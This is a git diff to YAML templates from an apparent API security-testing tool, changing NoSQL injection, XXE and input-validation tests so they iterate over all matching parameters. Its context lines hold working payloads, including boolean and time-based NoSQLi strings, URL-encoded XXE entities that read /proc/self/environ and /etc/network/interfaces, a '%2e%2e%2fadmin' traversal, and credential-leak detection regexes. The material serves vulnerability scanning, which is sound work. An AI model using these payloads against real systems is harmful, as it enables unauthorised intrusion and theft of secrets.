a/Injection-Attacks/NoSQLiBooleanBasedJSONBodyParamJS.yml +++ b/Injection-Attacks/NoSQLiBooleanBasedJSONBodyParamJS.yml @@ -76,7 +76,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: extract: changed_body_value execute: @@ -84,7 +84,8 @@ execute: requests: - req: - modify_body_param: - changed_body_key: !!str ${changed_body_value} && 'a' != 'a' && 'a' != 'a + ${changed_body_key}: !!str ${changed_body_value} && 'a' != 'a' && 'a' != 'a + for_each_combination: true - validate: or: - response_code: @@ -117,7 +118,8 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: !!str ${changed_body_value} || 'a' == 'a' || 'a + ${changed_body_key}: !!str ${changed_body_value} || 'a' == 'a' || 'a + for_each_combination: true - validate: response_code: gte: 200 @@ -148,7 +150,8 @@ execute: - add_header: dummyHeader: dummyValue - modify_body_param: - changed_body_key: !!str ${changed_body_value} || 'a' == 'a' || 'a + ${changed_body_key}: !!str ${changed_body_value} || 'a' == 'a' || 'a + for_each_combination: true - validate: response_payload: eq_obj: "${x2.response.body}" diff --git a/Injection-Attacks/NoSQLiBooleanBasedQueryParamJS.yml b/Injection-Attacks/NoSQLiBooleanBasedQueryParamJS.yml index 5af386742..61ca833ba 100644 --- a/Injection-Attacks/NoSQLiBooleanBasedQueryParamJS.yml +++ b/Injection-Attacks/NoSQLiBooleanBasedQueryParamJS.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -86,6 +86,7 @@ execute: - delete_query_param: ${changed_query_key} - add_query_param: ${changed_query_key}: !!str ${changed_query_value};return false; + for_each_combination: true - validate: or: - and: @@ -121,6 +122,7 @@ execute: - delete_query_param: ${changed_query_key} - add_query_param: ${changed_query_key}: !!str ${changed_query_value} || 'a' == 'a' || 'a' == 'a' + for_each_combination: true - validate: response_code: gte: 200 @@ -154,6 +156,7 @@ execute: - delete_query_param: ${changed_query_key} - add_query_param: ${changed_query_key}: !!str ${changed_query_value} || '1' == '1' || '1' == '1' + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Injection-Attacks/NoSQLiBooleanBasedQueryParamRegex.yml b/Injection-Attacks/NoSQLiBooleanBasedQueryParamRegex.yml index f8b1465f7..9f9c4fddd 100644 --- a/Injection-Attacks/NoSQLiBooleanBasedQueryParamRegex.yml +++ b/Injection-Attacks/NoSQLiBooleanBasedQueryParamRegex.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value diff --git a/Injection-Attacks/TimeBasedNoSQLiJSONParam.yml b/Injection-Attacks/TimeBasedNoSQLiJSONParam.yml index a483deb51..29c23f762 100644 --- a/Injection-Attacks/TimeBasedNoSQLiJSONParam.yml +++ b/Injection-Attacks/TimeBasedNoSQLiJSONParam.yml @@ -77,7 +77,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: regex: .* extract: changed_body_value @@ -133,7 +133,8 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: ${changed_body_value}${timeBasedPayloads} + ${changed_body_key}: ${changed_body_value}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Injection-Attacks/TimeBasedNoSQLiJSONParamDELETE.yml b/Injection-Attacks/TimeBasedNoSQLiJSONParamDELETE.yml index 6c41e227c..c9b66d211 100644 --- a/Injection-Attacks/TimeBasedNoSQLiJSONParamDELETE.yml +++ b/Injection-Attacks/TimeBasedNoSQLiJSONParamDELETE.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: regex: .* extract: changed_body_value @@ -131,7 +131,8 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: ${changed_body_value}${timeBasedPayloads} + ${changed_body_key}: ${changed_body_value}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Injection-Attacks/TimeBasedNoSQLiJSONParamPATCH.yml b/Injection-Attacks/TimeBasedNoSQLiJSONParamPATCH.yml index a8c940d81..58ca374b6 100644 --- a/Injection-Attacks/TimeBasedNoSQLiJSONParamPATCH.yml +++ b/Injection-Attacks/TimeBasedNoSQLiJSONParamPATCH.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key value: regex: .* extract: changed_body_value @@ -131,7 +131,8 @@ execute: - failure: exit - req: - modify_body_param: - changed_body_key: ${changed_body_value}${timeBasedPayloads} + ${changed_body_key}: ${changed_body_value}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Injection-Attacks/TimeBasedNoSQLiQueryParam.yml b/Injection-Attacks/TimeBasedNoSQLiQueryParam.yml index ec27bf2cb..ce83ea09d 100644 --- a/Injection-Attacks/TimeBasedNoSQLiQueryParam.yml +++ b/Injection-Attacks/TimeBasedNoSQLiQueryParam.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key value: regex: .* extract: changed_query_value @@ -131,7 +131,8 @@ execute: - failure: exit - req: - modify_query_param: - changed_query_key: ${changed_query_value}${timeBasedPayloads} + ${changed_query_key}: ${changed_query_value}${timeBasedPayloads} + for_each_combination: true - validate: response_code: eq: 429 diff --git a/Injection-Attacks/XXECustomDocumentTypeDefinition.yml b/Injection-Attacks/XXECustomDocumentTypeDefinition.yml index c072c304a..e01531d0e 100644 --- a/Injection-Attacks/XXECustomDocumentTypeDefinition.yml +++ b/Injection-Attacks/XXECustomDocumentTypeDefinition.yml @@ -74,7 +74,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -91,6 +91,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: length: diff --git a/Injection-Attacks/XXEErrorBasedTest.yml b/Injection-Attacks/XXEErrorBasedTest.yml index 8f2ce57f4..bb56bb9bc 100644 --- a/Injection-Attacks/XXEErrorBasedTest.yml +++ b/Injection-Attacks/XXEErrorBasedTest.yml @@ -72,7 +72,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -88,6 +88,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: and: - response_payload: diff --git a/Injection-Attacks/XXEInternalFileDisclosure.yml b/Injection-Attacks/XXEInternalFileDisclosure.yml index 579763ca1..1ade294b9 100644 --- a/Injection-Attacks/XXEInternalFileDisclosure.yml +++ b/Injection-Attacks/XXEInternalFileDisclosure.yml @@ -74,7 +74,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -90,6 +90,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "^(\\w+):(\\$[0-9]\\$[^:]+):(\\d+):(\\d+):(\\d+):(\\d*):(\\d*):(\\d*):$" diff --git a/Injection-Attacks/XXELFI.yml b/Injection-Attacks/XXELFI.yml index 3dbd91457..5319b93b4 100644 --- a/Injection-Attacks/XXELFI.yml +++ b/Injection-Attacks/XXELFI.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -89,6 +89,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}) - ([a-zA-Z0-9_-]*) \\[([^\\]]+)\\] \"(GET|POST|HEAD|PUT|DELETE|OPTIONS) ([^\"]+)\" (\\d{3}) (\\d+)" diff --git a/Injection-Attacks/XXEParameterEntityFileDisclosure.yml b/Injection-Attacks/XXEParameterEntityFileDisclosure.yml index 061261c98..3b4ba581e 100644 --- a/Injection-Attacks/XXEParameterEntityFileDisclosure.yml +++ b/Injection-Attacks/XXEParameterEntityFileDisclosure.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -89,6 +89,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "^([^:]+):([^:]*):(\\d+):(\\d+):([^:]*):([^:]*):([^:\\n\\r]*)$" diff --git a/Injection-Attacks/XXEPathTraversal.yml b/Injection-Attacks/XXEPathTraversal.yml index 09a3aff63..0442df8bc 100644 --- a/Injection-Attacks/XXEPathTraversal.yml +++ b/Injection-Attacks/XXEPathTraversal.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -90,6 +90,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "^([^:]+):([^:]*):(\\d+):(\\d+):([^:]*):([^:]*):([^:\\n\\r]*)$" diff --git a/Injection-Attacks/XXEPublicDocumentTypeDefinition.yml b/Injection-Attacks/XXEPublicDocumentTypeDefinition.yml index fb7ff13d6..ad8b35936 100644 --- a/Injection-Attacks/XXEPublicDocumentTypeDefinition.yml +++ b/Injection-Attacks/XXEPublicDocumentTypeDefinition.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -90,6 +90,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "^([^:]+):([^:]*):(\\d+):(\\d+):([^:]*):([^:]*):([^:\\n\\r]*)$" diff --git a/Injection-Attacks/XXEReadEnvVar.yml b/Injection-Attacks/XXEReadEnvVar.yml index 9eb5b0503..2d5894f87 100644 --- a/Injection-Attacks/XXEReadEnvVar.yml +++ b/Injection-Attacks/XXEReadEnvVar.yml @@ -79,12 +79,12 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key wordLists: payloads: - "%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fproc%2Fself%2Fenviron%22%3E%5D%3E%3Cuser%3E%3Cname%3E%26xxe%3B%3C%2Fname%3E%3C%2Fuser%3E" @@ -93,9 +93,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${payloads} + ${changed_body_key}: ${payloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${payloads} + ${changed_query_key}: ${payloads} + for_each_combination: true validate: response_payload: regex: '(\w+=[\w\/\.\-:]+)(?:\0\w+=[\w\/\.\-:]+)*' diff --git a/Injection-Attacks/XXERevealNetworkConfig.yml b/Injection-Attacks/XXERevealNetworkConfig.yml index f5c3dd0a4..bd5afd885 100644 --- a/Injection-Attacks/XXERevealNetworkConfig.yml +++ b/Injection-Attacks/XXERevealNetworkConfig.yml @@ -76,12 +76,12 @@ api_selection_filters: for_one: key: regex: .* - extract: changed_body_key + extractMultiple: changed_body_key - query_param: for_one: key: regex: .* - extract: changed_query_key + extractMultiple: changed_query_key wordLists: payloads: - "%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20%25%20custom%20SYSTEM%20%5C%22file%3A%2F%2F%2Fetc%2Fnetwork%2Finterfaces%5C%22%3E%20%25custom%3B%5D%3E" @@ -91,9 +91,11 @@ execute: requests: - req: - modify_body_param: - changed_body_key: ${payloads} + ${changed_body_key}: ${payloads} + for_each_combination: true - modify_query_param: - changed_query_key: ${payloads} + ${changed_query_key}: ${payloads} + for_each_combination: true validate: response_payload: contains_all: diff --git a/Injection-Attacks/XXESOAPAPIConfigDisclosure.yml b/Injection-Attacks/XXESOAPAPIConfigDisclosure.yml index 9c0e75901..87a7947be 100644 --- a/Injection-Attacks/XXESOAPAPIConfigDisclosure.yml +++ b/Injection-Attacks/XXESOAPAPIConfigDisclosure.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -90,6 +90,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "<(config|configuration|settings)>.+" diff --git a/Injection-Attacks/XXEServerInformationLeak.yml b/Injection-Attacks/XXEServerInformationLeak.yml index 259ccaa50..6c07b49e4 100644 --- a/Injection-Attacks/XXEServerInformationLeak.yml +++ b/Injection-Attacks/XXEServerInformationLeak.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -90,6 +90,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: and: - response_payload: diff --git a/Injection-Attacks/XXESoapAPICredentialsExposure.yml b/Injection-Attacks/XXESoapAPICredentialsExposure.yml index 046d1c427..3dba9c8a2 100644 --- a/Injection-Attacks/XXESoapAPICredentialsExposure.yml +++ b/Injection-Attacks/XXESoapAPICredentialsExposure.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -100,6 +100,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "(DB_USER|DB_PASSWORD|AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|username|password|CLIENT_ID|CLIENT_SECRET|aws_access_key_id|aws_secret_access_key)\\s*[:=]\\s*[\\w/+=@.-]+" diff --git a/Injection-Attacks/XXESoapAPILogFileDisclosure.yml b/Injection-Attacks/XXESoapAPILogFileDisclosure.yml index edfdf0dc2..84af8f9bf 100644 --- a/Injection-Attacks/XXESoapAPILogFileDisclosure.yml +++ b/Injection-Attacks/XXESoapAPILogFileDisclosure.yml @@ -73,7 +73,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -100,6 +100,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2}|[A-Z]+\\s+\\[\\w+\\].+\\d{4}/\\d{2}/\\d{2} \\d{2}:\\d{2}:\\d{2}\\.\\d{3}|(\\[.*\\] \\[.*\\] \\[client \\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\])|\\b[A-Z]+\\b \\d{1,2} \\d{2}:\\d{2}:\\d{2} \\w+ \\w+\\[\\d+\\]:" diff --git a/Injection-Attacks/XXEURLEncoded.yml b/Injection-Attacks/XXEURLEncoded.yml index 6086dde7f..74260f2e3 100644 --- a/Injection-Attacks/XXEURLEncoded.yml +++ b/Injection-Attacks/XXEURLEncoded.yml @@ -72,7 +72,7 @@ api_selection_filters: contains_either: - content-type - Content-Type - extract: headerKey + extractMultiple: headerKey method: contains_either: - POST @@ -89,6 +89,7 @@ execute: - replace_body: ${payloads} - modify_header: ${headerKey}: "application/xml" + for_each_combination: true validate: response_payload: regex: "^([^:]+):([^:]*):(\\d+):(\\d+):([^:]*):([^:]*):([^:\\n\\r]*)$" diff --git a/Input-Validation/BalanceCalculationHandling.yml b/Input-Validation/BalanceCalculationHandling.yml index 49ce924a6..c3923dced 100644 --- a/Input-Validation/BalanceCalculationHandling.yml +++ b/Input-Validation/BalanceCalculationHandling.yml @@ -81,7 +81,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -158,7 +158,8 @@ execute: requests: - req: - modify_body_param: - userKey: "${failValues}" + ${userKey}: "${failValues}" + for_each_combination: true - validate: response_code: gte: 200 @@ -177,7 +178,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "${passValues}" + ${userKey}: "${passValues}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/BypassAdminRestrictionsViaURLEncoding.yml b/Input-Validation/BypassAdminRestrictionsViaURLEncoding.yml index d9b0a7e65..2eb782782 100644 --- a/Input-Validation/BypassAdminRestrictionsViaURLEncoding.yml +++ b/Input-Validation/BypassAdminRestrictionsViaURLEncoding.yml @@ -93,8 +93,9 @@ execute: - req: - modify_url: regex_replace: - regex: admin + regex: ${probableInputParameters} replace_with: "%2e%2e%2fadmin" + for_each_combination: true - remove_auth_header: true - validate: response_code: diff --git a/Input-Validation/BypassInputalidationWithNullValues.yml b/Input-Validation/BypassInputalidationWithNullValues.yml index e869cbe06..f943513f2 100644 --- a/Input-Validation/BypassInputalidationWithNullValues.yml +++ b/Input-Validation/BypassInputalidationWithNullValues.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -144,7 +144,8 @@ execute: - failure: x2 - req: - modify_body_param: - userKey: ${userVal}${nullValues} + ${userKey}: ${userVal}${nullValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/BypassRateLimitWithInvalidData.yml b/Input-Validation/BypassRateLimitWithInvalidData.yml index f4304ae40..faa7f7581 100644 --- a/Input-Validation/BypassRateLimitWithInvalidData.yml +++ b/Input-Validation/BypassRateLimitWithInvalidData.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey wordLists: probableInputParameters: @@ -170,7 +170,8 @@ execute: # attack attempts -1 - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -183,7 +184,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -196,7 +198,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -209,7 +212,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -222,7 +226,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -251,7 +256,8 @@ execute: # attack attempts -2 - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -264,7 +270,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -277,7 +284,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -290,7 +298,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 @@ -303,7 +312,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/BypassRegistrationDeadlineValidation.yml b/Input-Validation/BypassRegistrationDeadlineValidation.yml index 4565bbcd7..73b1f85f8 100644 --- a/Input-Validation/BypassRegistrationDeadlineValidation.yml +++ b/Input-Validation/BypassRegistrationDeadlineValidation.yml @@ -74,21 +74,21 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey1 + extractMultiple: userKey1 value: regex: "\b\\d{4}-\\d{2}-\\d{2}\b" - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey2 + extractMultiple: userKey2 value: datatype: number - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey3 + extractMultiple: userKey3 value: regex: "\b\\d{10}\b" @@ -188,11 +188,14 @@ execute: requests: - req: - modify_body_param: - userKey2: "1*${attemptValues4}" + ${userKey2}: "1*${attemptValues4}" + for_each_combination: true - modify_body_param: - userKey3: "${attemptValues4}" + ${userKey3}: "${attemptValues4}" + for_each_combination: true - modify_body_param: - userKey1: ${attemptValues3} + ${userKey1}: ${attemptValues3} + for_each_combination: true - validate: response_code: gte: 200 @@ -235,11 +238,14 @@ execute: - failure: exit - req: - modify_body_param: - userKey2: "1*${attemptValues2}" + ${userKey2}: "1*${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey3: "${attemptValues2}" + ${userKey3}: "${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey1: ${attemptValues1} + ${userKey1}: ${attemptValues1} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/BypassSubscriptionPauseHandling.yml b/Input-Validation/BypassSubscriptionPauseHandling.yml index 78d4f4299..4e5bfbbe7 100644 --- a/Input-Validation/BypassSubscriptionPauseHandling.yml +++ b/Input-Validation/BypassSubscriptionPauseHandling.yml @@ -75,21 +75,21 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey1 + extractMultiple: userKey1 value: regex: "\b\\d{4}-\\d{2}-\\d{2}\b" - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey2 + extractMultiple: userKey2 value: datatype: number - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey3 + extractMultiple: userKey3 value: regex: "\b\\d{10}\b" @@ -189,11 +189,14 @@ execute: - failure: exit - req: - modify_body_param: - userKey2: "1*${attemptValues2}" + ${userKey2}: "1*${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey3: "${attemptValues2}" + ${userKey3}: "${attemptValues2}" + for_each_combination: true - modify_body_param: - userKey1: ${attemptValues1} + ${userKey1}: ${attemptValues1} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/HeaderInvalidValues.yml b/Input-Validation/HeaderInvalidValues.yml index 6c19f9cd3..61df9317c 100644 --- a/Input-Validation/HeaderInvalidValues.yml +++ b/Input-Validation/HeaderInvalidValues.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -91,7 +91,8 @@ execute: - failure: exit - req: - modify_header: - userKey: "${userVal}${attemptValues}" + ${userKey}: "${userVal}${attemptValues}" + for_each_combination: true - validate: response_code: gte: 200 @@ -106,7 +107,8 @@ execute: - failure: x3 - req: - modify_header: - userKey: "${attemptValues}" + ${userKey}: "${attemptValues}" + for_each_combination: true - validate: response_code: gte: 200 @@ -121,7 +123,8 @@ execute: - failure: x4 - req: - modify_header: - userKey: "${attemptValues}${userVal}" + ${userKey}: "${attemptValues}${userVal}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ImproperCharacterHandling.yml b/Input-Validation/ImproperCharacterHandling.yml index 9019dc2a9..d688d19d5 100644 --- a/Input-Validation/ImproperCharacterHandling.yml +++ b/Input-Validation/ImproperCharacterHandling.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -111,7 +111,8 @@ execute: requests: - req: - modify_body_param: - userKey: "${invalidCharacters}${userVal}${invalidCharacters}" + ${userKey}: "${invalidCharacters}${userVal}${invalidCharacters}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Input-Validation/ImproperCurrencyCodeHandling.yml b/Input-Validation/ImproperCurrencyCodeHandling.yml index b334332e1..ae4cf12cb 100644 --- a/Input-Validation/ImproperCurrencyCodeHandling.yml +++ b/Input-Validation/ImproperCurrencyCodeHandling.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey wordLists: probableInputParameters: @@ -154,7 +154,8 @@ execute: - failure: x2 - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ImproperFloatPointHandling.yml b/Input-Validation/ImproperFloatPointHandling.yml index 622d6ad71..8ba489bce 100644 --- a/Input-Validation/ImproperFloatPointHandling.yml +++ b/Input-Validation/ImproperFloatPointHandling.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: datatype: number extract: userVal @@ -169,7 +169,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${attemptValues} + ${userKey}: ${userVal}${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ImproperPageSizeHandling.yml b/Input-Validation/ImproperPageSizeHandling.yml index bab37c8f2..3ab27f028 100644 --- a/Input-Validation/ImproperPageSizeHandling.yml +++ b/Input-Validation/ImproperPageSizeHandling.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: "(?i)(page[_-]?size|per[_-]?page|limit|items[_-]?per[_-]?page|max[_-]?results|page[_-]?limit)" - extract: limitKey + extractMultiple: limitKey value: extract: limitValue regex: "^\\d+$" @@ -136,7 +136,8 @@ execute: - failure: exit - req: - modify_query_param: - limitKey: ${attemptValues} + ${limitKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/InputValidationByReplacingObjectWithPrimitive.yml b/Input-Validation/InputValidationByReplacingObjectWithPrimitive.yml index b1b28203c..5929ce934 100644 --- a/Input-Validation/InputValidationByReplacingObjectWithPrimitive.yml +++ b/Input-Validation/InputValidationByReplacingObjectWithPrimitive.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: extract: userVal diff --git a/Input-Validation/InputValidationByReplacingParamWithArray.yml b/Input-Validation/InputValidationByReplacingParamWithArray.yml index 4b2c49b67..9dab7c827 100644 --- a/Input-Validation/InputValidationByReplacingParamWithArray.yml +++ b/Input-Validation/InputValidationByReplacingParamWithArray.yml @@ -75,7 +75,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -92,8 +92,9 @@ execute: - failure: exit - req: - modify_body_param: - userKey: + ${userKey}: - ${userVal} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/InsufficientFundsCheck.yml b/Input-Validation/InsufficientFundsCheck.yml index 9da984162..869213b55 100644 --- a/Input-Validation/InsufficientFundsCheck.yml +++ b/Input-Validation/InsufficientFundsCheck.yml @@ -83,7 +83,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: datatype: number extract: userVal @@ -92,7 +92,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey2 + extractMultiple: userKey2 value: regex: "\b([1-9][0-9]*)\b" extract: userVal2 @@ -201,9 +201,11 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "${outputUserValue1}*1000" + ${userKey}: "${outputUserValue1}*1000" + for_each_combination: true - modify_body_param: - userKey2: ${outputUserValue1}000 + ${userKey2}: ${outputUserValue1}000 + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ManipulateAutoRenewal.yml b/Input-Validation/ManipulateAutoRenewal.yml index 66ce54f44..7c12fcdde 100644 --- a/Input-Validation/ManipulateAutoRenewal.yml +++ b/Input-Validation/ManipulateAutoRenewal.yml @@ -80,14 +80,14 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: datatype: boolean - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: regex: "^(?i)(true|false)$" wordLists: @@ -135,7 +135,8 @@ execute: requests: - req: - modify_body_param: - userKey: "${failValues}" + ${userKey}: "${failValues}" + for_each_combination: true - validate: response_code: gte: 200 @@ -183,7 +184,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "${passValues}" + ${userKey}: "${passValues}" + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ManipulateStoreCredit.yml b/Input-Validation/ManipulateStoreCredit.yml index 9d515bee4..9da87a4ca 100644 --- a/Input-Validation/ManipulateStoreCredit.yml +++ b/Input-Validation/ManipulateStoreCredit.yml @@ -79,7 +79,7 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -131,7 +131,8 @@ execute: requests: - req: - modify_body_param: - userKey: 100 + ${userKey}: 100 + for_each_combination: true - validate: response_code: gte: 200 @@ -150,7 +151,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: 200 + ${userKey}: 200 + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Input-Validation/ManipulatingSubscriptionDates.yml b/Input-Validation/ManipulatingSubscriptionDates.yml index 9999160f9..fc3d3c247 100644 --- a/Input-Validation/ManipulatingSubscriptionDates.yml +++ b/Input-Validation/ManipulatingSubscriptionDates.yml @@ -74,21 +74,21 @@ api_selection_filters: for_one: key: regex: "${probableInputParameters}" - extract: userKey1 + extractMultiple: userKey1 value: regex: "\b\\d{4}-\\d{2}-\\d{2}\b" - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey2 + extractMultiple: userKey2 value: datatype: number - request_payload: for_one: key: regex: "${probableInputParameters}" - extract: userKey3 + extractMultiple: userKey3 value: regex: "\b\\d{10}\b" @@ -151,11 +151,14 @@ execute: requests: - req: - 